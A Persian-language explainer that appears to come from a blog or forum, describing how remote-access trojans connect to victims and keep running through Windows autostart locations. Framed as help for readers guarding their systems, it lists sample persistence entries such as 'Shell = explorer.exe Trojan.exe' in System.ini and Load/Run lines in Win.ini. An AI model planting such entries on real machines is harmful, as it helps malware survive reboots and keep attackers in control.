تروجان ها به دو قسمت تقسیم می شوند. یك قسمت Client (خدمات گیرنده) و دیگری Server (خدمات دهنده). وقتی قربانی ندانسته قسمت Server را روی سیستم خودش اجرا می كند. حمله كننده بوسیله قسمت Client با Server كه روی كامپیوتر قربانی است متصل می شود و از آن پس می تواند كنترل سیستم قربانی را در دست بگیرد . پروتكل TCP/IP كه استاندارد معمول برای برقراری ارتباطات است به این تروجان آلوده میشود و تروجان از طریق آن كارش را انجام می دهد. البته لازم به ذكر است كه برخی اعمال تروجانها نیز از پروتكل UDP استفاده می كنند. معمولاً زمانی كه Server روی كامپیوتر قربانی اجرا می شود. خود را در جایی از حافظه مخفی می كند تا پیدا كردن یا تشخیص آن مشكل شود و به برخی درگاههای خاص (Port) گوش می دهد تا ببیند درخواست ارتباطی به سیستم از طرف حمله كننده آمده است یا نه، از طرفی رجیستری را نیز به گونه ای ویرایش می كند كه برخی از اعمال بطور خودكار روی سیستم شروع به كار كنند.

برای نفوذ كننده لازم است كه IP قربانی را بداند برای اینكه بتواند به سیستم او متصل شود. اكثر قریب به اتفاق تروجانها بصورتی برنامه ریزی شده اند كه IP قربانی را برای حمله كننده ارسال می كنند همانند سیستم پیغام گذار از طریق ICQ یا IRS . این زمانی اتفاق می افتد كه قربانی IP دینامیك داشته باشد بدین معنی كه هر زمان به اینترنت متصل میشود و یك IP متفاوت از قبل داشته باشد كه اغلب سیستم هایی كه به روش dial- up به اینترنت متصل می شوند از این قانون پیروی می كنند. كاربران ASDL معمولا IP های ثابت دارند به همین علت IP آلوده شده همواره برای حمله كننده شناخته شده است و این حالت باعث تسهیل درامر اتصال به سیستم قربانی می گردد.

اغلب تروجانها از روش شروع اتوماتیك استفاده می كنند. بصورتی كه اگر شما كامپیوترتان را خاموش كنید آنها قادر خواهند كه فعالیتهایشان را مجددا ً آغاز كنند و دسترسی لازم به حمله كننده را روی سیستم شما بدهند و ساختن تروجانها با قابلیت شروع روشهایی هستند كه همیشه مورد استفاده قرار می گیرند. یكی از این روشها، محلق كردن تروجان به یك فایل اجرایی كه كاربرد زیادی دارد می باشد، به عبارت دیگر محلق نمودن تروجان به یك برنامه پركاربرد ، موجب عملی شدن تفكرات حمله كننده خواهد شد. روشهای شناخته شده نیز همانند دستكاری فایلهای ریجستری ویندوز می تواند به عملی شدن افكار حمله كننده بیانجامد. فایلهای سیستمی ویندوز قرار دارند كه می توانند بهترین انتخابهای حمله كنندگان باشند.


به جهت اینکه دوستان بتوانند سیستم خود را در برابر این حمله ها محافظت نمایند، قسمتهای مختلف ویندوز که می توان از آن استفاده نمود را در اینجا بررسی می کنیم.

پوشه شروع خودكار

پوشه ای كه بصورت خودكار در شروع كار ویندوز فراخوانی می شود و فایلهای داخل آن بصورت اتوماتیك اجرا می شوند در آدرس زیر قرار دارند.


C: windows start Menu programs startup

البته فرض برای این است كه سیستم عامل ویندوز در درایو C و در شاخه windows نصب شده باشد.

فایل Win.ini

فرمت شروع خودكار در این فایل بصورت زیر می باشد :

Load = Trojan.exe

Run = Trojan.exe

فایل System.ini

فرمت بكارگیری تروجان در این فایل سیستمی بصورت زیر است:

Shell = explorer.exe Trojan.exe

كه باعث می شود بعد از هر بار اجرای Explorer فایل Trojan.exe اجرا شود.


فایل Wininit.ini

این فایل توسط Setup.exe برنامه های نصب شوند مورد استفاده قرار می گیرد.

بدین صورت كه یك بار اجرا شود، قابلیت حذف خودكار را نیز دارد كه برای تروجان ها بسیار سهل می باشد.

Winstart.bat

این فایل دسته ای هم در ابتدای شروع به كار ویندوز فراخوانی شده و فرامین داخل آن به ترتیب اجرای می شوند كه تروجان می تواند با افزودن خط زیر خود را در حافظه بار كند.

@ Trojan.exe

فایل Autoexec.bat

این فایل دسته ای هم از فایلهای معروف فراخوانی شده در ابتدای كار سیستم عامل می باشد كه می توان با دستكاری و اضافه نمودن خط زیر بر آن تروجان مورد نظر را در سیستم قربانی اجرا نمود:

C: Trojan.exe

فایل Config.sys

این فایل نیز از معروفترین فایلهای پیكر بندی سیستم است و می تواند در امر اجرای تروجان كاربرد داشته باشد.